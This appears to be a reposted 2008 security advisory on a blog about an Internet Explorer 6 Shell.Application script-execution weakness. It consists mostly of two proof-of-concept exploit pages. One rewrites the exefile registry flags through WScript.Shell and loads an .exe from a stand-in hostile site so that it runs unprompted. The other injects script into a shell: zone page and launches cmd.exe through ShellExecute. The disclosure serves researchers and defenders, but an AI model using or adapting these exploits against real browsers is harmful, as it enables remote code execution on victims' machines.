Jun 21, 2008
71 Views

[malware]Microsoft Internet Explorer Shell.Application Object Script Execution Weakness

Written by

Vulnerable: Microsoft Internet Explorer 6.0 SP1 – Microsoft Internet Explorer 6.0

Credit:     “[email protected]” <[email protected]> disclosed this weakness.

Several proof-of-concept examples have been presented:

“Matthew Murphy” <[email protected]> proposed:

<html><head>
<script language=”JavaScript” defer>
function throw_onload() {
actx.RegWrite(“HKCR\\exefile\\EditFlags”, 0x38070000, “REG_BINARY”);
window.close();
}
var actx = new ActiveXObject(“WScript.Shell”);
actx.RegWrite(“HKCR\\exefile\\EditFlags”, 256, “REG_BINARY”);
document.writeln(“<IFRAME SRC=\”http://www.somebadsite.com/file.exe\”
ONLOAD=\”throw_onload()\” />”);
window.setTimeout(“throw_onload()”, 5000); // Don’t know for sure if IE
fires OnLoad for .exe files! Anyone?
</script></head><body></body></html>

[email protected]” <[email protected]> presented:
<iframe src=”shell:windows\web\tip.htm”
style=”width:400px;height:200px;”></iframe>
<textarea id=”code” style=”display:none;”>
injected.
<script language=”JScript” DEFER>
alert(‘attempting injection’);
var obj=new ActiveXObject(“Shell.Application”);
obj.ShellExecute(“cmd.exe”,”/c pause”);
</script>
</textarea>
<script language=”javascript”>
function doit() {
document.frames[0].document.body.insertAdjacentHTML(‘afterBegin’,
document.all.code.value);
}
setTimeout(“doit()”, 2000);
</script>

Article Tags:
·
Article Categories:
Virut/Trojan
    http://linholiver.com

    https://linholiver.com/diary/about/